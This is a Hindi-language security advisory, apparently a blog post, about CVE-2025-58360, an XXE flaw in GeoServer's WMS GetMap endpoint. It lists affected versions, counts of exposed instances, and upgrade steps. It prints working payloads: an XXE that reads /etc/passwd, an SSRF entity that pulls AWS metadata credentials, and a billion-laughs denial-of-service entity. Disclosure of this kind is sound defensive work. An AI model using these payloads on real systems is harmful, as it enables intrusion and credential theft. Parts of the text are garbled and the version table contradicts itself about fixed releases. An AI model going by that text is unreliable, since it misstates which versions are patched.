
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:Lयह WMS GetMap एंडपॉइंट में एक क्लासिक लेकिन विनाशकारी XXE है।
हमलावर कर सकते हैं:
/etc/passwd, , निजी कुंजियाँ, आदि)geoserver.xml| घटक | असुरक्षित संस्करण | निर्धारित संस्करण | स्थिति |
|---|---|---|---|
| GeoServer स्टैंडअलोन | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 असुरक्षित |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 असुरक्षित |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 असुरक्षित |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 असुरक्षित |
| GeoServer 2.27.x और नए | – | पहले ही पैच किया गया | ✅ सुरक्षित |
| स्रोत | एक्सपोज़्ड इंस्टेंस | नोट्स |
|---|---|---|
| ZoomEye | ~49,400 | app:"GeoServer" खोज |
| FOFA | ~24,000 | पिछले वर्ष के परिणाम |
| Shodan | ~31,000 | पोर्ट 8080 + शीर्षक मिलान |
| GobySec | ~20,000 | सार्वजनिक नेटवर्क स्कैन |
→ यानी अभी खुले इंटरनेट पर दसियों हज़ार संभावित रूप से असुरक्षित सर्वर मौजूद हैं! 🌐
एंडपॉइंट: POST /geoserver/wms
मुख्य पैरामीटर: SLD_BODY (कच्ची XML स्टाइलिंग की अनुमति देता है)
असुरक्षित कोड पथ: XML पार्सर बाहरी इकाई समाधान को अक्षम नहीं करता → क्लासिक XXE।

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ प्रतिक्रिया में /etc/passwd की सामग्री होती है 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ EC2 पर चलने पर अस्थायी AWS क्रेडेंशियल्स लीक हो जाते हैं।
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>
→ सेकंडों में गीगाबाइट्स RAM की खपत करता है 💥
| संस्करण | रिलीज़ तिथि | डाउनलोड लिंक |
|---|---|---|
| 2.27.0 | 25 नवंबर, 2025 | https://geoserver.org/release/stable/ |
| 2.26.3 | 25 नवंबर, 2025 | रखरखाव शाखा पैच |
| 2.25.6 | 25 नवंबर, 2025 | पुरानी समर्थित शाखा |
Docker उपयोगकर्ता:
docker pull osgeo/geoserver:2.27.0
<!ENTITY या SYSTEM "file:// वाले अनुरोधों को अस्वीकार करें| तिथि | घटना |
|---|---|
| नवंबर 2025 से पहले | XBOW AI स्कैनर द्वारा स्वायत्त रूप से खोजा गया |
| 25 नवंबर, 2025 | समन्वित प्रकटीकरण → पैच जारी |
| 25 नवंबर, 2025 | CVE असाइन और प्रकाशित |
| 26 नवंबर, 2025 | PoCs वायरल होते हैं, एक्सपोज़र स्कैन बढ़ जाते हैं |
यह एक पाठ्यपुस्तकीय XXE है जो दसियों हज़ार इंटरनेट-सामने वाले उदाहरणों वाले व्यापक रूप से तैनात भू-स्थानिक प्लेटफ़ॉर्म को प्रभावित करता है।
प्रकटीकरण के उसी दिन पैच गिराए गए — गति के लिए GeoServer टीम को बहुत बधाई! 🏆
लेकिन पैच उपलब्धता और बड़े पैमाने पर शोषण के बीच की खिड़की तेज़ी से सिकुड़ रही है।
यदि आप GeoServer चलाते हैं → आज ही अपग्रेड करें।
अगली सुर्ख़ी न बनें।
सुरक्षित रहें, चमकते रहें! 🛡️✨